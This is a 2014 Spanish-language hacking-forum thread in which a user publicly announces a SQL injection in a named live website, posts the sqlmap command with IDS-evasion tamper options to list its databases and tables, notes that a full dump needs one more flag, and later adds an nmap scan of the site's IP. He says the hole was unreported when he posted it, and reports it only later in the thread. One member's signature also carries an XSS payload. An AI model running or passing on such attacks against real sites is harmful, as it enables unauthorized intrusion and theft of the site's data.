send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[SQL INJECTION] http://www.idocz.net/Login.php?id='

  • 6 Respuestas
  • 2387 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado charly837

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« en: Mayo 08, 2014, 12:24:37 pm »
Hola a todos , nose si es mi primer post , espero que no, en caso de ser asi, me doy por presentado, y os traigo un regalito:

Web: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login'



Utilice Sqlmap para explotar la vulnerabilidad, acontinuacion pongo los parametro usados para listar las bases de datos y las tablas

C:\sqlmap>sqlmap.py -u "You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login" --dbs --dbms=MySQL --ignore-proxy --tamper "space2morehash"  -D idocz_web --tables



utilice la opcion tamper y ignore-proxy porque en el lugar que lo estoy haciendo hay ids , ips y me bloqueba los ataques (No seria necesario), en caso de querer hacer un dumpeado , bastaria con la opcion --dump-all alfinal.

me interese un poco en la version de apache que tiene el servidor que es la  Apache 2.2.14 y encontre muchos exploits, os expongo la url de uno de ellos que me parecio interesante , esto no lo he podido probar ya que no dispongo de linux en este momento.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

y la lista completa para esa version de apache 2.2.14 es:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

nose si serva vulnerable a todos pero alguno seguro!!

He intentado ser todo lo explicito que he podido, nose si demasiado, o demasiado poco , en cualquier caso , que los moderadores me digan!

la vulnerabilidad no ha sido reportada.

Espero que os haya resultado interesantem o por lo menos tan interesante como ami hacerlo  :D :D :D :D, gracias a todos por este foro!

« Última modificación: Mayo 08, 2014, 12:27:05 pm por charly837 »

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5281
  • Actividad:
    30%
  • Reputación 28
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Mayo 08, 2014, 12:26:10 pm »
Muy bueno bro! Le reportaste el fallo al webmaster?

Saludos!
ANTRAX


Desconectado charly837

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #2 en: Mayo 08, 2014, 12:28:46 pm »
No, todavia no se lo he reportado, acabo de editar el post poniendo eso precisamente  :D :D :D :D

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5281
  • Actividad:
    30%
  • Reputación 28
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #3 en: Mayo 08, 2014, 12:42:55 pm »
Espero que lo reparen antes de que algun lammer lo explote.
Muy buen trabajo bro!

Saludos!
ANTRAX


Desconectado Jimeno

  • *
  • Underc0der
  • Mensajes: 367
  • Actividad:
    0%
  • Reputación -1
  • NULL
    • Ver Perfil
    • Twitter
  • Skype: migueljimeno96
  • Twitter: "><<img src=y onerror=prompt();>
« Respuesta #4 en: Mayo 08, 2014, 12:52:33 pm »
Si puedes añadir una captura del reporte estaría genial. Por cierto, no creo que se deban mostrar las tablas (información sensible), con una breve prueba de concepto sobra, saludos.
Contacto: @migueljimeno96 -

Desconectado charly837

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #5 en: Mayo 08, 2014, 02:45:23 pm »
Os pongo el reporte del nmap que resulta bastante interesante, direis porque usa los parametros -O y -A al mismo tiemop pues nose tengo manias...  ;D ;D ;D ;D ;D

Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
[*] exec: nmap -sS -PN -O 184.71.243.98 -A -sC


Starting Nmap 6.40 ( http://nmap.org ) at 2014-05-08 15:35 EDT
Nmap scan report for 184.71.243.98
Host is up (0.23s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.2.14 ((Ubuntu))
|_http-title: Home
443/tcp open  ssl/http Apache httpd 2.2.14
|_http-methods: No Allow or Public header in OPTIONS response (status code 404)
|_http-title: Site doesn't have a title (text/plain).
| ssl-cert: Subject: commonName=*.idocz.net
| Not valid before: 2014-02-26T13:59:42+00:00
|_Not valid after:  2015-04-02T02:26:31+00:00
|_ssl-date: 2014-05-08T17:27:37+00:00; -2h09m16s from local time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 2.6.X (87%)
OS CPE: cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 2.6.32 - 2.6.33 (87%), Linux 2.6.32 - 2.6.35 (87%), Linux 2.6.31 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 14 hops
Service Info: Host: pass.idocz.net

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   3.70 ms   192.168.0.1
2   11.03 ms  10.219.32.1
3   13.43 ms  10.127.44.125
4   22.75 ms  10.207.243.53
5   12.49 ms  10.254.5.110
6   13.74 ms  mad-b2-link.telia.net (80.239.160.81)
7   118.82 ms prs-bb2-link.telia.net (80.91.245.60)
8   145.40 ms nyk-bb1-link.telia.net (80.91.253.122)
9   140.56 ms chi-bb1-link.telia.net (213.155.136.19)
10  138.85 ms shawbusiness-ic-300305-chi-eqx-i1.c.telia.net (62.115.12.90)
11  148.43 ms rc2nr-hge0-9-0-0.wp.shawcable.net (66.163.77.201)
12  172.47 ms rc3no-tge0-11-0-11.cg.shawcable.net (66.163.64.173)
13  189.71 ms dx2dt-te3.cg.shawcable.net (64.59.132.158)
14  224.01 ms 184.71.243.98

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.28 seconds

Desconectado charly837

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #6 en: Mayo 08, 2014, 03:00:24 pm »
Ya he reportado la vulnerabilidad a la pagina web a traves de su correo de contacto, Ya en sus manos queda...

 

¿Te gustó el post? COMPARTILO!



SQLI WAF Bypass y SQLI LoadFile http://www.lasemana.es/

Iniciado por hdbreaker

Respuestas: 0
Vistas: 1065
Último mensaje Julio 25, 2013, 02:55:56 am
por hdbreaker
Me ahorre dos días de espera por un fallo de SQL injection

Iniciado por wgetputolink

Respuestas: 3
Vistas: 1542
Último mensaje Agosto 15, 2016, 12:12:46 pm
por cnfs
www.inameh.gob.ve - SQL Injection [UB]

Iniciado por M5f3r0

Respuestas: 0
Vistas: 1409
Último mensaje Septiembre 28, 2013, 02:32:48 pm
por M5f3r0
SQLI Double Error Based http://campusvirtual.frsf.utn.edu.ar

Iniciado por hdbreaker

Respuestas: 1
Vistas: 976
Último mensaje Febrero 19, 2013, 06:59:26 pm
por ANTRAX
SQLI Source Data http://bolivia.infoleyes.com/

Iniciado por hdbreaker

Respuestas: 0
Vistas: 1107
Último mensaje Junio 25, 2013, 10:37:19 pm
por hdbreaker